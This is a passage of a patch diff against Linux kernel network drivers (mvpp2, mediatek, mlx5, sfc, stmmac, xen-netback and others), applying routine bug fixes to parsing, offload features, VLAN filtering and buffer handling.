+-	err = mvpp2_prs_double_vlan_add(priv, ETH_P_8021Q, ETH_P_8021AD,
++	/* Double VLAN: 0x88A8, 0x8100 */
++	err = mvpp2_prs_double_vlan_add(priv, ETH_P_8021AD, ETH_P_8021Q,
+ 					MVPP2_PRS_PORT_MASK);
+ 	if (err)
+ 		return err;
+@@ -1607,59 +1607,45 @@ static int mvpp2_prs_vlan_init(struct platform_device *pdev, struct mvpp2 *priv)
+ static int mvpp2_prs_pppoe_init(struct mvpp2 *priv)
+ {
+ 	struct mvpp2_prs_entry pe;
+-	int tid;
+-
+-	/* IPv4 over PPPoE with options */
+-	tid = mvpp2_prs_tcam_first_free(priv, MVPP2_PE_FIRST_FREE_TID,
+-					MVPP2_PE_LAST_FREE_TID);
+-	if (tid < 0)
+-		return tid;
+-
+-	memset(&pe, 0, sizeof(pe));
+-	mvpp2_prs_tcam_lu_set(&pe, MVPP2_PRS_LU_PPPOE);
+-	pe.index = tid;
+-
+-	mvpp2_prs_match_etype(&pe, 0, PPP_IP);
+-
+-	mvpp2_prs_sram_next_lu_set(&pe, MVPP2_PRS_LU_IP4);
+-	mvpp2_prs_sram_ri_update(&pe, MVPP2_PRS_RI_L3_IP4_OPT,
+-				 MVPP2_PRS_RI_L3_PROTO_MASK);
+-	/* goto ipv4 dest-address (skip eth_type + IP-header-size - 4) */
+-	mvpp2_prs_sram_shift_set(&pe, MVPP2_ETH_TYPE_LEN +
+-				 sizeof(struct iphdr) - 4,
+-				 MVPP2_PRS_SRAM_OP_SEL_SHIFT_ADD);
+-	/* Set L3 offset */
+-	mvpp2_prs_sram_offset_set(&pe, MVPP2_PRS_SRAM_UDF_TYPE_L3,
+-				  MVPP2_ETH_TYPE_LEN,
+-				  MVPP2_PRS_SRAM_OP_SEL_UDF_ADD);
+-
+-	/* Update shadow table and hw entry */
+-	mvpp2_prs_shadow_set(priv, pe.index, MVPP2_PRS_LU_PPPOE);
+-	mvpp2_prs_hw_write(priv, &pe);
++	int tid, ihl;
+ 
+-	/* IPv4 over PPPoE without options */
+-	tid = mvpp2_prs_tcam_first_free(priv, MVPP2_PE_FIRST_FREE_TID,
+-					MVPP2_PE_LAST_FREE_TID);
+-	if (tid < 0)
+-		return tid;
++	/* IPv4 over PPPoE with header length >= 5 */
++	for (ihl = MVPP2_PRS_IPV4_IHL_MIN; ihl <= MVPP2_PRS_IPV4_IHL_MAX; ihl++) {
++		tid = mvpp2_prs_tcam_first_free(priv, MVPP2_PE_FIRST_FREE_TID,
++						MVPP2_PE_LAST_FREE_TID);
++		if (tid < 0)
++			return tid;
+ 
+-	pe.index = tid;
++		memset(&pe, 0, sizeof(pe));
++		mvpp2_prs_tcam_lu_set(&pe, MVPP2_PRS_LU_PPPOE);
++		pe.index = tid;
+ 
+-	mvpp2_prs_tcam_data_byte_set(&pe, MVPP2_ETH_TYPE_LEN,
+-				     MVPP2_PRS_IPV4_HEAD |
+-				     MVPP2_PRS_IPV4_IHL_MIN,
+-				     MVPP2_PRS_IPV4_HEAD_MASK |
+-				     MVPP2_PRS_IPV4_IHL_MASK);
++		mvpp2_prs_match_etype(&pe, 0, PPP_IP);
++		mvpp2_prs_tcam_data_byte_set(&pe, MVPP2_ETH_TYPE_LEN,
++					     MVPP2_PRS_IPV4_HEAD | ihl,
++					     MVPP2_PRS_IPV4_HEAD_MASK |
++					     MVPP2_PRS_IPV4_IHL_MASK);
+ 
+-	/* Clear ri before updating */
+-	pe.sram[MVPP2_PRS_SRAM_RI_WORD] = 0x0;
+-	pe.sram[MVPP2_PRS_SRAM_RI_CTRL_WORD] = 0x0;
+-	mvpp2_prs_sram_ri_update(&pe, MVPP2_PRS_RI_L3_IP4,
+-				 MVPP2_PRS_RI_L3_PROTO_MASK);
++		mvpp2_prs_sram_next_lu_set(&pe, MVPP2_PRS_LU_IP4);
++		mvpp2_prs_sram_ri_update(&pe, MVPP2_PRS_RI_L3_IP4,
++					 MVPP2_PRS_RI_L3_PROTO_MASK);
++		/* goto ipv4 dst-address (skip eth_type + IP-header-size - 4) */
++		mvpp2_prs_sram_shift_set(&pe, MVPP2_ETH_TYPE_LEN +
++					 sizeof(struct iphdr) - 4,
++					 MVPP2_PRS_SRAM_OP_SEL_SHIFT_ADD);
++		/* Set L3 offset */
++		mvpp2_prs_sram_offset_set(&pe, MVPP2_PRS_SRAM_UDF_TYPE_L3,
++					  MVPP2_ETH_TYPE_LEN,
++					  MVPP2_PRS_SRAM_OP_SEL_UDF_ADD);
++		/* Set L4 offset */
++		mvpp2_prs_sram_offset_set(&pe, MVPP2_PRS_SRAM_UDF_TYPE_L4,
++					  MVPP2_ETH_TYPE_LEN + (ihl * 4),
++					  MVPP2_PRS_SRAM_OP_SEL_UDF_ADD);
+ 
+-	/* Update shadow table and hw entry */
+-	mvpp2_prs_shadow_set(priv, pe.index, MVPP2_PRS_LU_PPPOE);
+-	mvpp2_prs_hw_write(priv, &pe);
++		/* Update shadow table and hw entry */
++		mvpp2_prs_shadow_set(priv, pe.index, MVPP2_PRS_LU_PPPOE);
++		mvpp2_prs_hw_write(priv, &pe);
++	}
+ 
+ 	/* IPv6 over PPPoE */
+ 	tid = mvpp2_prs_tcam_first_free(priv, MVPP2_PE_FIRST_FREE_TID,
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index 332329cb1ee00..bd7c18c839d42 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -713,8 +713,6 @@ static void mtk_mac_link_up(struct phylink_config *config,
+ 		break;
+ 	}
+ 
+-	mtk_set_queue_speed(mac->hw, mac->id, speed);
+-
+ 	/* Configure duplex */
+ 	if (duplex == DUPLEX_FULL)
+ 		mcr |= MAC_MCR_FORCE_DPX;
+@@ -2008,9 +2006,6 @@ static int mtk_poll_rx(struct napi_struct *napi, int budget,
+ 			skb_checksum_none_assert(skb);
+ 		skb->protocol = eth_type_trans(skb, netdev);
+ 
+-		if (reason == MTK_PPE_CPU_REASON_HIT_UNBIND_RATE_REACHED)
+-			mtk_ppe_check_skb(eth->ppe[0], skb, hash);
+-
+ 		if (netdev->features & NETIF_F_HW_VLAN_CTAG_RX) {
+ 			if (MTK_HAS_CAPS(eth->soc->caps, MTK_NETSYS_V2)) {
+ 				if (trxd.rxd3 & RX_DMA_VTAG_V2) {
+@@ -2038,6 +2033,9 @@ static int mtk_poll_rx(struct napi_struct *napi, int budget,
+ 			__vlan_hwaccel_put_tag(skb, htons(vlan_proto), vlan_tci);
+ 		}
+ 
++		if (reason == MTK_PPE_CPU_REASON_HIT_UNBIND_RATE_REACHED)
++			mtk_ppe_check_skb(eth->ppe[0], skb, hash);
++
+ 		skb_record_rx_queue(skb, 0);
+ 		napi_gro_receive(napi, skb);
+ 
+diff --git a/drivers/net/ethernet/mediatek/mtk_ppe.c b/drivers/net/ethernet/mediatek/mtk_ppe.c
+index 1ff024f42444b..2ea539ccc0802 100644
+--- a/drivers/net/ethernet/mediatek/mtk_ppe.c
++++ b/drivers/net/ethernet/mediatek/mtk_ppe.c
+@@ -8,6 +8,7 @@
+ #include <linux/platform_device.h>
+ #include <linux/if_ether.h>
+ #include <linux/if_vlan.h>
++#include <net/dst_metadata.h>
+ #include <net/dsa.h>
+ #include "mtk_eth_soc.h"
+ #include "mtk_ppe.h"
+@@ -458,6 +459,7 @@ __mtk_foe_entry_clear(struct mtk_ppe *ppe, struct mtk_flow_entry *entry)
+ 		hwe->ib1 &= ~MTK_FOE_IB1_STATE;
+ 		hwe->ib1 |= FIELD_PREP(MTK_FOE_IB1_STATE, MTK_FOE_STATE_INVALID);
+ 		dma_wmb();
++		mtk_ppe_cache_clear(ppe);
+ 	}
+ 	entry->hash = 0xffff;
+ 
+@@ -699,7 +701,9 @@ void __mtk_ppe_check_skb(struct mtk_ppe *ppe, struct sk_buff *skb, u16 hash)
+ 		    skb->dev->dsa_ptr->tag_ops->proto != DSA_TAG_PROTO_MTK)
+ 			goto out;
+ 
+-		tag += 4;
++		if (!skb_metadata_dst(skb))
++			tag += 4;
++
+ 		if (get_unaligned_be16(tag) != ETH_P_8021Q)
+ 			break;
+ 
+diff --git a/drivers/net/ethernet/mediatek/mtk_ppe_offload.c b/drivers/net/ethernet/mediatek/mtk_ppe_offload.c
+index 81afd5ee3fbf1..161751bb36c9c 100644
+--- a/drivers/net/ethernet/mediatek/mtk_ppe_offload.c
++++ b/drivers/net/ethernet/mediatek/mtk_ppe_offload.c
+@@ -576,6 +576,7 @@ mtk_eth_setup_tc_block(struct net_device *dev, struct flow_block_offload *f)
+ 		if (IS_ERR(block_cb))
+ 			return PTR_ERR(block_cb);
+ 
++		flow_block_cb_incref(block_cb);
+ 		flow_block_cb_add(block_cb, f);
+ 		list_add_tail(&block_cb->driver_list, &block_cb_list);
+ 		return 0;
+@@ -584,7 +585,7 @@ mtk_eth_setup_tc_block(struct net_device *dev, struct flow_block_offload *f)
+ 		if (!block_cb)
+ 			return -ENOENT;
+ 
+-		if (flow_block_cb_decref(block_cb)) {
++		if (!flow_block_cb_decref(block_cb)) {
+ 			flow_block_cb_remove(block_cb, f);
+ 			list_del(&block_cb->driver_list);
+ 		}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 47d4b54d15634..1f4233b2842f7 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -4117,13 +4117,17 @@ static bool mlx5e_xsk_validate_mtu(struct net_device *netdev,
+ 		struct xsk_buff_pool *xsk_pool =
+ 			mlx5e_xsk_get_pool(&chs->params, chs->params.xsk, ix);
+ 		struct mlx5e_xsk_param xsk;
++		int max_xdp_mtu;
+ 
+ 		if (!xsk_pool)
+ 			continue;
+ 
+ 		mlx5e_build_xsk_param(xsk_pool, &xsk);
++		max_xdp_mtu = mlx5e_xdp_max_mtu(new_params, &xsk);
+ 
+-		if (!mlx5e_validate_xsk_param(new_params, &xsk, mdev)) {
++		/* Validate XSK params and XDP MTU in advance */
++		if (!mlx5e_validate_xsk_param(new_params, &xsk, mdev) ||
++		    new_params->sw_mtu > max_xdp_mtu) {
+ 			u32 hr = mlx5e_get_linear_rq_headroom(new_params, &xsk);
+ 			int max_mtu_frame, max_mtu_page, max_mtu;
+ 
+@@ -4133,9 +4137,9 @@ static bool mlx5e_xsk_validate_mtu(struct net_device *netdev,
+ 			 */
+ 			max_mtu_frame = MLX5E_HW2SW_MTU(new_params, xsk.chunk_size - hr);
+ 			max_mtu_page = MLX5E_HW2SW_MTU(new_params, SKB_MAX_HEAD(0));
+-			max_mtu = min(max_mtu_frame, max_mtu_page);
++			max_mtu = min3(max_mtu_frame, max_mtu_page, max_xdp_mtu);
+ 
+-			netdev_err(netdev, "MTU %d is too big for an XSK running on channel %u. Try MTU <= %d\n",
++			netdev_err(netdev, "MTU %d is too big for an XSK running on channel %u or its redirection XDP program. Try MTU <= %d\n",
+ 				   new_params->sw_mtu, ix, max_mtu);
+ 			return false;
+ 		}
+diff --git a/drivers/net/ethernet/realtek/r8169_phy_config.c b/drivers/net/ethernet/realtek/r8169_phy_config.c
+index 930496cd34ed0..b50f16786c246 100644
+--- a/drivers/net/ethernet/realtek/r8169_phy_config.c
++++ b/drivers/net/ethernet/realtek/r8169_phy_config.c
+@@ -826,6 +826,9 @@ static void rtl8168h_2_hw_phy_config(struct rtl8169_private *tp,
+ 	/* disable phy pfm mode */
+ 	phy_modify_paged(phydev, 0x0a44, 0x11, BIT(7), 0);
+ 
++	/* disable 10m pll off */
++	phy_modify_paged(phydev, 0x0a43, 0x10, BIT(0), 0);
++
+ 	rtl8168g_disable_aldps(phydev);
+ 	rtl8168g_config_eee_phy(phydev);
+ }
+diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c
+index 7022fb2005a2f..d30459dbfe8f8 100644
+--- a/drivers/net/ethernet/sfc/ef10.c
++++ b/drivers/net/ethernet/sfc/ef10.c
+@@ -1304,7 +1304,8 @@ static void efx_ef10_fini_nic(struct efx_nic *efx)
+ static int efx_ef10_init_nic(struct efx_nic *efx)
+ {
+ 	struct efx_ef10_nic_data *nic_data = efx->nic_data;
+-	netdev_features_t hw_enc_features = 0;
++	struct net_device *net_dev = efx->net_dev;
++	netdev_features_t tun_feats, tso_feats;
+ 	int rc;
+ 
+ 	if (nic_data->must_check_datapath_caps) {
+@@ -1349,20 +1350,30 @@ static int efx_ef10_init_nic(struct efx_nic *efx)
+ 		nic_data->must_restore_piobufs = false;
+ 	}
+ 
+-	/* add encapsulated checksum offload features */
++	/* encap features might change during reset if fw variant changed */
+ 	if (efx_has_cap(efx, VXLAN_NVGRE) && !efx_ef10_is_vf(efx))
+-		hw_enc_features |= NETIF_F_IP_CSUM | NETIF_F_IPV6_CSUM;
+-	/* add encapsulated TSO features */
+-	if (efx_has_cap(efx, TX_TSO_V2_ENCAP)) {
+-		netdev_features_t encap_tso_features;
++		net_dev->hw_enc_features |= NETIF_F_IP_CSUM | NETIF_F_IPV6_CSUM;
++	else
++		net_dev->hw_enc_features &= ~(NETIF_F_IP_CSUM | NETIF_F_IPV6_CSUM);
+ 
+-		encap_tso_features = NETIF_F_GSO_UDP_TUNNEL | NETIF_F_GSO_GRE |
+-			NETIF_F_GSO_UDP_TUNNEL_CSUM | NETIF_F_GSO_GRE_CSUM;
++	tun_feats = NETIF_F_GSO_UDP_TUNNEL | NETIF_F_GSO_GRE |
++		    NETIF_F_GSO_UDP_TUNNEL_CSUM | NETIF_F_GSO_GRE_CSUM;
++	tso_feats = NETIF_F_TSO | NETIF_F_TSO6;
+ 
+-		hw_enc_features |= encap_tso_features | NETIF_F_TSO;
+-		efx->net_dev->features |= encap_tso_features;
++	if (efx_has_cap(efx, TX_TSO_V2_ENCAP)) {
++		/* If this is first nic_init, or if it is a reset and a new fw
++		 * variant has added new features, enable them by default.
++		 * If the features are not new, maintain their current value.
++		 */
++		if (!(net_dev->hw_features & tun_feats))
++			net_dev->features |= tun_feats;
++		net_dev->hw_enc_features |= tun_feats | tso_feats;
++		net_dev->hw_features |= tun_feats;
++	} else {
++		net_dev->hw_enc_features &= ~(tun_feats | tso_feats);
++		net_dev->hw_features &= ~tun_feats;
++		net_dev->features &= ~tun_feats;
+ 	}
+-	efx->net_dev->hw_enc_features = hw_enc_features;
+ 
+ 	/* don't fail init if RSS setup doesn't work */
+ 	rc = efx->type->rx_push_rss_config(efx, false,
+@@ -4021,7 +4032,10 @@ static unsigned int efx_ef10_recycle_ring_size(const struct efx_nic *efx)
+ 	 NETIF_F_HW_VLAN_CTAG_FILTER |	\
+ 	 NETIF_F_IPV6_CSUM |		\
+ 	 NETIF_F_RXHASH |		\
+-	 NETIF_F_NTUPLE)
++	 NETIF_F_NTUPLE |		\
++	 NETIF_F_SG |			\
++	 NETIF_F_RXCSUM |		\
++	 NETIF_F_RXALL)
+ 
+ const struct efx_nic_type efx_hunt_a0_vf_nic_type = {
+ 	.is_vf = true,
+diff --git a/drivers/net/ethernet/sfc/efx.c b/drivers/net/ethernet/sfc/efx.c
+index 3a86f1213a051..6a1bff54bc6c3 100644
+--- a/drivers/net/ethernet/sfc/efx.c
++++ b/drivers/net/ethernet/sfc/efx.c
+@@ -1001,21 +1001,18 @@ static int efx_pci_probe_post_io(struct efx_nic *efx)
+ 	}
+ 
+ 	/* Determine netdevice features */
+-	net_dev->features |= (efx->type->offload_features | NETIF_F_SG |
+-			      NETIF_F_TSO | NETIF_F_RXCSUM | NETIF_F_RXALL);
+-	if (efx->type->offload_features & (NETIF_F_IPV6_CSUM | NETIF_F_HW_CSUM)) {
+-		net_dev->features |= NETIF_F_TSO6;
+-		if (efx_has_cap(efx, TX_TSO_V2_ENCAP))
+-			net_dev->hw_enc_features |= NETIF_F_TSO6;
+-	}
+-	/* Check whether device supports TSO */
+-	if (!efx->type->tso_versions || !efx->type->tso_versions(efx))
+-		net_dev->features &= ~NETIF_F_ALL_TSO;
++	net_dev->features |= efx->type->offload_features;
++
++	/* Add TSO features */
++	if (efx->type->tso_versions && efx->type->tso_versions(efx))
++		net_dev->features |= NETIF_F_TSO | NETIF_F_TSO6;
++
+ 	/* Mask for features that also apply to VLAN devices */
+ 	net_dev->vlan_features |= (NETIF_F_HW_CSUM | NETIF_F_SG |
+ 				   NETIF_F_HIGHDMA | NETIF_F_ALL_TSO |
+ 				   NETIF_F_RXCSUM);
+ 
++	/* Determine user configurable features */
+ 	net_dev->hw_features |= net_dev->features & ~efx->fixed_features;
+ 
+ 	/* Disable receiving frames with bad FCS, by default. */
+diff --git a/drivers/net/ethernet/smsc/smsc911x.c b/drivers/net/ethernet/smsc/smsc911x.c
+index a2e511912e6a9..a690d139e1770 100644
+--- a/drivers/net/ethernet/smsc/smsc911x.c
++++ b/drivers/net/ethernet/smsc/smsc911x.c
+@@ -1037,8 +1037,6 @@ static int smsc911x_mii_probe(struct net_device *dev)
+ 		return ret;
+ 	}
+ 
+-	/* Indicate that the MAC is responsible for managing PHY PM */
+-	phydev->mac_managed_pm = true;
+ 	phy_attached_info(phydev);
+ 
+ 	phy_set_max_speed(phydev, SPEED_100);
+@@ -1066,6 +1064,7 @@ static int smsc911x_mii_init(struct platform_device *pdev,
+ 			     struct net_device *dev)
+ {
+ 	struct smsc911x_data *pdata = netdev_priv(dev);
++	struct phy_device *phydev;
+ 	int err = -ENXIO;
+ 
+ 	pdata->mii_bus = mdiobus_alloc();
+@@ -1108,6 +1107,10 @@ static int smsc911x_mii_init(struct platform_device *pdev,
+ 		goto err_out_free_bus_2;
+ 	}
+ 
++	phydev = phy_find_first(pdata->mii_bus);
++	if (phydev)
++		phydev->mac_managed_pm = true;
++
+ 	return 0;
+ 
+ err_out_free_bus_2:
+diff --git a/drivers/net/ethernet/stmicro/stmmac/common.h b/drivers/net/ethernet/stmicro/stmmac/common.h
+index ec9c130276d89..54bb072aeb2d3 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/common.h
++++ b/drivers/net/ethernet/stmicro/stmmac/common.h
+@@ -532,7 +532,6 @@ struct mac_device_info {
+ 	unsigned int xlgmac;
+ 	unsigned int num_vlan;
+ 	u32 vlan_filter[32];
+-	unsigned int promisc;
+ 	bool vlan_fail_q_en;
+ 	u8 vlan_fail_q;
+ };
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c b/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
+index 8c7a0b7c99520..36251ec2589c9 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
+@@ -472,12 +472,6 @@ static int dwmac4_add_hw_vlan_rx_fltr(struct net_device *dev,
+ 	if (vid > 4095)
+ 		return -EINVAL;
+ 
+-	if (hw->promisc) {
+-		netdev_err(dev,
+-			   "Adding VLAN in promisc mode not supported\n");
+-		return -EPERM;
+-	}
+-
+ 	/* Single Rx VLAN Filter */
+ 	if (hw->num_vlan == 1) {
+ 		/* For single VLAN filter, VID 0 means VLAN promiscuous */
+@@ -527,12 +521,6 @@ static int dwmac4_del_hw_vlan_rx_fltr(struct net_device *dev,
+ {
+ 	int i, ret = 0;
+ 
+-	if (hw->promisc) {
+-		netdev_err(dev,
+-			   "Deleting VLAN in promisc mode not supported\n");
+-		return -EPERM;
+-	}
+-
+ 	/* Single Rx VLAN Filter */
+ 	if (hw->num_vlan == 1) {
+ 		if ((hw->vlan_filter[0] & GMAC_VLAN_TAG_VID) == vid) {
+@@ -557,39 +545,6 @@ static int dwmac4_del_hw_vlan_rx_fltr(struct net_device *dev,
+ 	return ret;
+ }
+ 
+-static void dwmac4_vlan_promisc_enable(struct net_device *dev,
+-				       struct mac_device_info *hw)
+-{
+-	void __iomem *ioaddr = hw->pcsr;
+-	u32 value;
+-	u32 hash;
+-	u32 val;
+-	int i;
+-
+-	/* Single Rx VLAN Filter */
+-	if (hw->num_vlan == 1) {
+-		dwmac4_write_single_vlan(dev, 0);
+-		return;
+-	}
+-
+-	/* Extended Rx VLAN Filter Enable */
+-	for (i = 0; i < hw->num_vlan; i++) {
+-		if (hw->vlan_filter[i] & GMAC_VLAN_TAG_DATA_VEN) {
+-			val = hw->vlan_filter[i] & ~GMAC_VLAN_TAG_DATA_VEN;
+-			dwmac4_write_vlan_filter(dev, hw, i, val);
+-		}
+-	}
+-
+-	hash = readl(ioaddr + GMAC_VLAN_HASH_TABLE);
+-	if (hash & GMAC_VLAN_VLHT) {
+-		value = readl(ioaddr + GMAC_VLAN_TAG);
+-		if (value & GMAC_VLAN_VTHM) {
+-			value &= ~GMAC_VLAN_VTHM;
+-			writel(value, ioaddr + GMAC_VLAN_TAG);
+-		}
+-	}
+-}
+-
+ static void dwmac4_restore_hw_vlan_rx_fltr(struct net_device *dev,
+ 					   struct mac_device_info *hw)
+ {
+@@ -709,22 +664,12 @@ static void dwmac4_set_filter(struct mac_device_info *hw,
+ 	}
+ 
+ 	/* VLAN filtering */
+-	if (dev->features & NETIF_F_HW_VLAN_CTAG_FILTER)
++	if (dev->flags & IFF_PROMISC && !hw->vlan_fail_q_en)
++		value &= ~GMAC_PACKET_FILTER_VTFE;
++	else if (dev->features & NETIF_F_HW_VLAN_CTAG_FILTER)
+ 		value |= GMAC_PACKET_FILTER_VTFE;
+ 
+ 	writel(value, ioaddr + GMAC_PACKET_FILTER);
+-
+-	if (dev->flags & IFF_PROMISC && !hw->vlan_fail_q_en) {
+-		if (!hw->promisc) {
+-			hw->promisc = 1;
+-			dwmac4_vlan_promisc_enable(dev, hw);
+-		}
+-	} else {
+-		if (hw->promisc) {
+-			hw->promisc = 0;
+-			dwmac4_restore_hw_vlan_rx_fltr(dev, hw);
+-		}
+-	}
+ }
+ 
+ static void dwmac4_flow_ctrl(struct mac_device_info *hw, unsigned int duplex,
+diff --git a/drivers/net/ieee802154/ca8210.c b/drivers/net/ieee802154/ca8210.c
+index 0b0c6c0764fe9..d0b5129439ed6 100644
+--- a/drivers/net/ieee802154/ca8210.c
++++ b/drivers/net/ieee802154/ca8210.c
+@@ -1902,10 +1902,9 @@ static int ca8210_skb_tx(
+ 	struct ca8210_priv  *priv
+ )
+ {
+-	int status;
+ 	struct ieee802154_hdr header = { };
+ 	struct secspec secspec;
+-	unsigned int mac_len;
++	int mac_len, status;
+ 
+ 	dev_dbg(&priv->spi->dev, "%s called\n", __func__);
+ 
+diff --git a/drivers/net/ipa/gsi_trans.c b/drivers/net/ipa/gsi_trans.c
+index 0f52c068c46d6..ee6fb00b71eb6 100644
+--- a/drivers/net/ipa/gsi_trans.c
++++ b/drivers/net/ipa/gsi_trans.c
+@@ -156,7 +156,7 @@ int gsi_trans_pool_init_dma(struct device *dev, struct gsi_trans_pool *pool,
+ 	 * gsi_trans_pool_exit_dma() can assume the total allocated
+ 	 * size is exactly (count * size).
+ 	 */
+-	total_size = get_order(total_size) << PAGE_SHIFT;
++	total_size = PAGE_SIZE << get_order(total_size);
+ 
+ 	virt = dma_alloc_coherent(dev, total_size, &addr, GFP_KERNEL);
+ 	if (!virt)
+diff --git a/drivers/net/net_failover.c b/drivers/net/net_failover.c
+index 7a28e082436e4..d0c916a53d7ce 100644
+--- a/drivers/net/net_failover.c
++++ b/drivers/net/net_failover.c
+@@ -130,14 +130,10 @@ static u16 net_failover_select_queue(struct net_device *dev,
+ 			txq = ops->ndo_select_queue(primary_dev, skb, sb_dev);
+ 		else
+ 			txq = netdev_pick_tx(primary_dev, skb, NULL);
+-
+-		qdisc_skb_cb(skb)->slave_dev_queue_mapping = skb->queue_mapping;
+-
+-		return txq;
++	} else {
++		txq = skb_rx_queue_recorded(skb) ? skb_get_rx_queue(skb) : 0;
+ 	}
+ 
+-	txq = skb_rx_queue_recorded(skb) ? skb_get_rx_queue(skb) : 0;
+-
+ 	/* Save the original txq to restore before passing to the driver */
+ 	qdisc_skb_cb(skb)->slave_dev_queue_mapping = skb->queue_mapping;
+ 
+diff --git a/drivers/net/phy/dp83869.c b/drivers/net/phy/dp83869.c
+index b4ff9c5073a3c..9ab5eff502b71 100644
+--- a/drivers/net/phy/dp83869.c
++++ b/drivers/net/phy/dp83869.c
+@@ -588,15 +588,13 @@ static int dp83869_of_init(struct phy_device *phydev)
+ 						       &dp83869_internal_delay[0],
+ 						       delay_size, true);
+ 	if (dp83869->rx_int_delay < 0)
+-		dp83869->rx_int_delay =
+-				dp83869_internal_delay[DP83869_CLK_DELAY_DEF];
++		dp83869->rx_int_delay = DP83869_CLK_DELAY_DEF;
+ 
+ 	dp83869->tx_int_delay = phy_get_internal_delay(phydev, dev,
+ 						       &dp83869_internal_delay[0],
+ 						       delay_size, false);
+ 	if (dp83869->tx_int_delay < 0)
+-		dp83869->tx_int_delay =
+-				dp83869_internal_delay[DP83869_CLK_DELAY_DEF];
++		dp83869->tx_int_delay = DP83869_CLK_DELAY_DEF;
+ 
+ 	return ret;
+ }
+diff --git a/drivers/net/vmxnet3/vmxnet3_drv.c b/drivers/net/vmxnet3/vmxnet3_drv.c
+index 682987040ea82..da488cbb05428 100644
+--- a/drivers/net/vmxnet3/vmxnet3_drv.c
++++ b/drivers/net/vmxnet3/vmxnet3_drv.c
+@@ -1688,7 +1688,9 @@ not_lro:
+ 			if (unlikely(rcd->ts))
+ 				__vlan_hwaccel_put_tag(skb, htons(ETH_P_8021Q), rcd->tci);
+ 
+-			if (adapter->netdev->features & NETIF_F_LRO)
++			/* Use GRO callback if UPT is enabled */
++			if ((adapter->netdev->features & NETIF_F_LRO) &&
++			    !rq->shared->updateRxProd)
+ 				netif_receive_skb(skb);
+ 			else
+ 				napi_gro_receive(&rq->napi, skb);
+diff --git a/drivers/net/wwan/iosm/iosm_ipc_imem.c b/drivers/net/wwan/iosm/iosm_ipc_imem.c
+index 1e6a479766429..c066b0040a3fe 100644
+--- a/drivers/net/wwan/iosm/iosm_ipc_imem.c
++++ b/drivers/net/wwan/iosm/iosm_ipc_imem.c
+@@ -587,6 +587,13 @@ static void ipc_imem_run_state_worker(struct work_struct *instance)
+ 	while (ctrl_chl_idx < IPC_MEM_MAX_CHANNELS) {
+ 		if (!ipc_chnl_cfg_get(&chnl_cfg_port, ctrl_chl_idx)) {
+ 			ipc_imem->ipc_port[ctrl_chl_idx] = NULL;
++
++			if (ipc_imem->pcie->pci->device == INTEL_CP_DEVICE_7560_ID &&
++			    chnl_cfg_port.wwan_port_type == WWAN_PORT_XMMRPC) {
++				ctrl_chl_idx++;
++				continue;
++			}
++
+ 			if (ipc_imem->pcie->pci->device == INTEL_CP_DEVICE_7360_ID &&
+ 			    chnl_cfg_port.wwan_port_type == WWAN_PORT_MBIM) {
+ 				ctrl_chl_idx++;
+diff --git a/drivers/net/xen-netback/common.h b/drivers/net/xen-netback/common.h
+index 3dbfc8a6924ed..1fcbd83f7ff2e 100644
+--- a/drivers/net/xen-netback/common.h
++++ b/drivers/net/xen-netback/common.h
+@@ -166,7 +166,7 @@ struct xenvif_queue { /* Per-queue data for xenvif */
+ 	struct pending_tx_info pending_tx_info[MAX_PENDING_REQS];
+ 	grant_handle_t grant_tx_handle[MAX_PENDING_REQS];
+ 
+-	struct gnttab_copy tx_copy_ops[MAX_PENDING_REQS];
++	struct gnttab_copy tx_copy_ops[2 * MAX_PENDING_REQS];
+ 	struct gnttab_map_grant_ref tx_map_ops[MAX_PENDING_REQS];
+ 	struct gnttab_unmap_grant_ref tx_unmap_ops[MAX_PENDING_REQS];
+ 	/* passed to gnttab_[un]map_refs with pages under (un)mapping */
+diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c
+index bf627af723bf9..5c266062c08f0 100644
+--- a/drivers/net/xen-netback/netback.c
++++ b/drivers/net/xen-netback/netback.c
+@@ -334,6 +334,7 @@ static int xenvif_count_requests(struct xenvif_queue *queue,
+ struct xenvif_tx_cb {
+ 	u16 copy_pending_idx[XEN_NETBK_LEGACY_SLOTS_MAX + 1];
+ 	u8 copy_count;
++	u32 split_mask;
+ };
+ 
+ #define XENVIF_TX_CB(skb) ((struct xenvif_tx_cb *)(skb)->cb)
+@@ -361,6 +362,8 @@ static inline struct sk_buff *xenvif_alloc_skb(unsigned int size)
+ 	struct sk_buff *skb =
+ 		alloc_skb(size + NET_SKB_PAD + NET_IP_ALIGN,
+ 			  GFP_ATOMIC | __GFP_NOWARN);
++
++	BUILD_BUG_ON(sizeof(*XENVIF_TX_CB(skb)) > sizeof(skb->cb));
+ 	if (unlikely(skb == NULL))
+ 		return NULL;
+ 
+@@ -396,11 +399,13 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 	nr_slots = shinfo->nr_frags + 1;
+ 
+ 	copy_count(skb) = 0;
++	XENVIF_TX_CB(skb)->split_mask = 0;
+ 
+ 	/* Create copy ops for exactly data_len bytes into the skb head. */
+ 	__skb_put(skb, data_len);
+ 	while (data_len > 0) {
+ 		int amount = data_len > txp->size ? txp->size : data_len;
++		bool split = false;
+ 
+ 		cop->source.u.ref = txp->gref;
+ 		cop->source.domid = queue->vif->domid;
+@@ -413,6 +418,13 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 		cop->dest.u.gmfn = virt_to_gfn(skb->data + skb_headlen(skb)
+ 				               - data_len);
+ 
++		/* Don't cross local page boundary! */
++		if (cop->dest.offset + amount > XEN_PAGE_SIZE) {
++			amount = XEN_PAGE_SIZE - cop->dest.offset;
++			XENVIF_TX_CB(skb)->split_mask |= 1U << copy_count(skb);
++			split = true;
++		}
++
+ 		cop->len = amount;
